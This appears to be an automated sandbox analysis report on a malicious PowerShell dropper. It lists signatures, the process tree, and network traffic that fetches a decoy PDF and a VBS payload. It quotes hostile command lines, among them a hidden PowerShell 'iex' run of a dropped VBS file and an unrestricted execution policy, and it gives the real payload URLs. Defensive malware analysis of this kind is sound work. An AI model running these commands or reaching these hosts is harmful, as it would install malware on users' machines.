Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KcKtHBkskI.ps1

Overview

General Information

Sample name:KcKtHBkskI.ps1
renamed because original name is a hash value
Original sample name:7883e31a07c25e30851390471a8d97e172ec6ec1ec98f49813d166f71cb819a1.ps1
Analysis ID:1578229
MD5:2ba11b739c9f9a18f60a2ada78e3bc41
SHA1:48fe4ec641ea47e5fe34cbf27dce776deabce03f
SHA256:7883e31a07c25e30851390471a8d97e172ec6ec1ec98f49813d166f71cb819a1
Tags:185-236-228-9287-120-112-91ps1www-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 8080 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 5084 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7260 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1736,i,1938861957224451301,13168527261703212553,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 2408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7272JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_7272.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7272, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'", ProcessId: 7476, ProcessName: powershell.exe
      Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
      Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7272, TargetFilename: C:\Users\Public\npq.vbs
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1", ProcessId: 7272, ProcessName: powershell.exe
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7272, TargetFilename: C:\Users\Public\npq.vbs
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1", ProcessId: 7272, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2408, ProcessName: svchost.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: KcKtHBkskI.ps1Avira: detected
      Multi AV Scanner detection for submitted file
      Source: KcKtHBkskI.ps1ReversingLabs: Detection: 36%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.6% probability
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.7:49701 version: TLS 1.2
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1514778693.00000198A01C4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: scorlib.pdb_2 source: powershell.exe, 00000000.00000002.1514778693.00000198A01C4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1431423233.0000019885E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1314807939.000001FC4F31E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb] source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1431423233.0000019885EB6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000000.00000002.1431423233.0000019885EB6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb3 source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdbre source: powershell.exe, 00000003.00000002.1317790097.000001FC4F6FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: tomation.pdbt source: powershell.exe, 00000000.00000002.1512207597.000001989FDD0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbX source: powershell.exe, 00000000.00000002.1431423233.0000019885E42000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: dbpdbtem.pdbA source: powershell.exe, 00000000.00000002.1512207597.000001989FDD0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1317790097.000001FC4F6FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000003.00000002.1317790097.000001FC4F6FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32D4X source: powershell.exe, 00000003.00000002.1315883159.000001FC4F59A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdbw} source: powershell.exe, 00000000.00000002.1514778693.00000198A0180000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000000.00000002.1431423233.0000019885EB6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ?/n.pdb source: powershell.exe, 00000003.00000002.1315104951.000001FC4F36D000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 203.175.174.69 203.175.174.69
      Source: Joe Sandbox ViewIP Address: 107.161.23.150 107.161.23.150
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global trafficDNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 11:48:28 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000000.00000002.1433403188.00000198897A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://astenterprises.com.pk
      Source: 77EC63BDA74BD0D0E0426DC8F80085060.12.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.13.dr, qmgr.db.13.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000000.00000002.1505237210.0000019897D33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1505237210.0000019897E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000000.00000002.1433403188.0000019887CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC37231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1433403188.00000198897A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.1433403188.000001988983A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1433403188.00000198897DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000000.00000002.1433403188.00000198897DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.1433403188.0000019887EF3000.00000004.00000800.00020000.00000000.sdmp, KcKtHBkskI.ps1String found in binary or memory: http://www.bluishmaxxlasishr.com/ms/ms.vbs
      Source: powershell.exe, 00000003.00000002.1317161256.000001FC4F6A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
      Source: powershell.exe, 00000000.00000002.1514703596.00000198A0020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.12.drString found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000000.00000002.1433403188.0000019887CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC37231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC38858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC3853D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38858000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: qmgr.db.13.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
      Source: svchost.exe, 0000000D.00000003.1390390863.00000226971A0000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, qmgr.db.13.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1433403188.00000198888F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC38858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC37C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.1505237210.0000019897D33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1505237210.0000019897E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: qmgr.db.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
      Source: ReaderMessages.11.drString found in binary or memory: https://www.adobe.co
      Source: powershell.exe, 00000000.00000002.1433403188.000001988939B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1433403188.000001988979F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.1433403188.000001988939B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List
      Source: powershell.exe, 00000000.00000002.1433403188.000001988939B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
      Source: powershell.exe, 00000000.00000002.1433403188.000001988939B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astishntishrprisishs.com.pk/ms/List%20of%20rishquirishd%20itishms%20and%20sishrvicishs.p
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.7:49701 version: TLS 1.2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC5A1DC50_2_00007FFAAC5A1DC5
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAC570F5D3_2_00007FFAAC570F5D
      Source: powershell.exe, 00000000.00000002.1433403188.0000019887EF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +nvironmentVariable('public') + '\\idj34h.vbp
      Source: classification engineClassification label: mal84.evad.winPS1@20/58@4/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vhwky43.zfr.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: KcKtHBkskI.ps1ReversingLabs: Detection: 36%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1736,i,1938861957224451301,13168527261703212553,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
